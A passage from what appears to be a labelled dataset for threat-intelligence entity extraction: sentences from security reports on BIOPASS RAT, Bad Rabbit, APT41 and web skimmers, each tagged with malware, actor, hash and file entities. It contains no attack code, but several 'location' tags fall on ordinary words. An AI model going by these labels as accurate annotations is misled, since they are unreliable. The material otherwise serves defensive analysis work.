scams.","entities":[{"id":26277,"label":"location","start_offset":23,"end_offset":31},{"id":26279,"label":"location","start_offset":113,"end_offset":117},{"id":26280,"label":"location","start_offset":124,"end_offset":130},{"id":26281,"label":"tools","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} +{"id":14138,"text":"However, the SYSTEM_ADMIN account has a different pattern because the actions are mostly due to manual administration activities.","entities":[],"relations":[],"Comments":[]} +{"id":2262,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":3364,"text":".Python.BIOPASS.A 30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10180,"label":"malware","start_offset":98,"end_offset":109},{"id":10179,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48981,"label":"malware","start_offset":1,"end_offset":17},{"id":48982,"label":"FILEPATH","start_offset":85,"end_offset":96}],"relations":[{"id":538,"from_id":48982,"to_id":10179,"type":"duplicate-of"},{"id":539,"from_id":10179,"to_id":10180,"type":"indicates"},{"id":540,"from_id":48982,"to_id":10180,"type":"indicates"},{"id":541,"from_id":48981,"to_id":10180,"type":"duplicate-of"}],"Comments":[]} +{"id":3989,"text":"The three most common methods are taking over the software update mechanism to deliver an updated software with malicious code, exploiting misconfigured access controls, and targeting publicly accessible code libraries, and inserting malicious code, which unknowing customers then download to their systems.","entities":[],"relations":[],"Comments":[]} +{"id":1571,"text":"The Ukrainian CERT has issued an alert on Bad Rabbit.","entities":[{"id":4696,"label":"malware","start_offset":42,"end_offset":52},{"id":46828,"label":"identity","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} +{"id":13752,"text":"The image on the right showcases how the DLL on a victim's machine appears.","entities":[],"relations":[],"Comments":[]} +{"id":9296,"text":"Unlike many web skimmers, which are designed to collect information from many kinds of e-commerce payment pages in general, the skimmer that the Mirrorthief group used was designed specifically for PrismWeb\u2019s payment page.","entities":[{"id":28712,"label":"location","start_offset":7,"end_offset":11},{"id":28713,"label":"location","start_offset":32,"end_offset":35},{"id":28714,"label":"location","start_offset":73,"end_offset":77},{"id":28715,"label":"location","start_offset":89,"end_offset":97},{"id":28718,"label":"tools","start_offset":217,"end_offset":221}],"relations":[],"Comments":[]} +{"id":5177,"text":"We also show a preview of the security gaps we found in the standard\u2019s specification and a summary of our testing procedure.","entities":[],"relations":[],"Comments":[]} +{"id":9700,"text":"Encoding the encryption key","entities":[],"relations":[],"Comments":[]} +{"id":1024,"text":" To further assess this threat, we purchased a customized, new account from a seller on Taobao.","entities":[{"id":46515,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} +{"id":1422,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":5329,"text":"After choosing an IP address and a TCP port pair, the core component creates a child process to perform the communication.","entities":[],"relations":[],"Comments":[]} +{"id":3872,"text":"Thus, there is a pressing need to detect and address threats via a proactive incident response strategy.","entities":[],"relations":[],"Comments":[]} +{"id":3272,"text":"The BIOPASS RAT malware implements multiple commands, most of which are self-explanatory.","entities":[{"id":9936,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} +{"id":4400,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} +{"id":3179,"text":" We also found several clues that show how the malware might be connected with the Winnti Group(also known as APT41). ","entities":[{"id":48308,"label":"threat-actor","start_offset":110,"end_offset":115},{"id":48307,"label":"threat-actor","start_offset":83,"end_offset":95}],"relations":[{"id":403,"from_id":48307,"to_id":48308,"type":"duplicate-of"}],"Comments":[]} +{"id":317,"text":"The key is putting a policy in place and making sure your technology is enforcing that policy at the network layer.","entities":[],"relations":[],"Comments":[]} +{"id":2431,"text":"However, while the original way of obtaining the class loader and exploiting it no longer works, a new feature of JDK was introduced in version 9, providing another way to obtain the class loader and making the exploit possible again.","entities":[{"id":47499,"label":"SOFTWARE","start_offset":114,"end_offset":117}],"relations":[],"Comments":[]} +{"id":8136,"text":"The app callCam hides its icon on the device after being launched.","entities":[],"relations":[],"Comments":[]} +{"id":775,"text":"Finally we make the size of the CMemoryProtector::ProtectedFree management structure larger than 0x186a0 forcing the freeing operation.","entities":[],"relations":[],"Comments":[]} +{"id":1583,"text":" Once inside a network, Bad Rabbit propagates itself to other systems.","entities":[{"id":4721,"label":"malware","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} +{"id":7991,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":24771,"label":"location","start_offset":9,"end_offset":15},{"id":24772,"label":"location","start_offset":30,"end_offset":34},{"id":24773,"label":"location","start_offset":46,"end_offset":53},{"id":24774,"label":"location","start_offset":54,"end_offset":58},{"id":24776,"label":"location","start_offset":141,"end_offset":144},{"id":24778,"label":"attack-pattern","start_offset":193,"end_offset":201}],"relations":[],"Comments":[]} +{"id":1112,"text":" In cases such as these the common approach is to use sets of the data, in this case sets of mutexes, to create fingerprints of each sample and then leverage those fingerprints to extract higher confidence classification decisions.","entities":[],"relations":[],"Comments":[]} +{"id":13266,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":3904,"text":"To learn more about how to protect smart factories and their critical operations, read Trend Micro's expertly crafted best practices and solutions: Smart Factory Security Solutions Trend Micro Best Practices for Securing Smart Factories Tags Latest News | ICS OT | APT & Targeted Attacks | Ransomware | Articles, News, Reports | Cyber Threats","entities":[{"id":49754,"label":"identity","start_offset":87,"end_offset":98}],"relations":[],"Comments":[]} +{"id":314,"text":" Once you can identify the traffic, you need to separate the good from the bad.","entities":[],"relations":[],"Comments":[]} +{"id":3175,"text":" We consider BIOPASS RAT as still being actively developed.","entities":[{"id":48301,"label":"malware","start_offset":13,"end_offset":24}],"relations":[],"Comments":[]} +{"id":13791,"text":"In order to hide the behaviors of the first-stage backdoor (which is the second payload), the first payload uses API hooking techniques to avoid being detected by a specific security product and to make an interference in the result of the function execution.","entities":[{"id":42815,"label":"attack-pattern","start_offset":117,"end_offset":124},{"id":42816,"label":"location","start_offset":174,"end_offset":182},{"id":42817,"label":"location","start_offset":191,"end_offset":194}],"relations":[],"Comments":[]} +{"id":5784,"text":"Jon:","entities":[],"relations":[],"Comments":[]} +{"id":3972,"text":" Enterprises and organizations should have comprehensive and efficient protection, detection, prevention, and remediation based on real-time, higher-confidence alerts to protect critical data and operations from sophisticated attacks and threats.","entities":[],"relations":[],"Comments":[]} +{"id":5470,"text":"Exploiting the human psyche with chat apps Probing Confucius\u2019 infrastructure, we came across websites offering Windows and Android chat applications, most likely iterations of its predecessor, Simple Chat Point: Secret Chat Point, and Tweety Chat.","entities":[{"id":51460,"label":"SOFTWARE","start_offset":123,"end_offset":130},{"id":51461,"label":"SOFTWARE","start_offset":193,"end_offset":210},{"id":51458,"label":"threat-actor","start_offset":51,"end_offset":60},{"id":51459,"label":"SOFTWARE","start_offset":111,"end_offset":118},{"id":51462,"label":"SOFTWARE","start_offset":212,"end_offset":229},{"id":51463,"label":"SOFTWARE","start_offset":235,"end_offset":246}],"relations":[],"Comments":[]} +{"id":1279,"text":"Additionally, the actors have now added the popular PlugX backdoor to their toolkit.","entities":[{"id":46653,"label":"malware","start_offset":52,"end_offset":66}],"relations":[],"Comments":[]} +{"id":13004,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook users.","entities":[{"id":48806,"label":"threat-actor","start_offset":29,"end_offset":41},{"id":48802,"label":"attack-pattern","start_offset":52,"end_offset":61},{"id":48803,"label":"SOFTWARE","start_offset":80,"end_offset":89}],"relations":[],"Comments":[]} +{"id":5369,"text":"Asus module main loop If the data coming from the core component starts with \u201c c:\\programdata\\\\.bat \/sc \/once \/st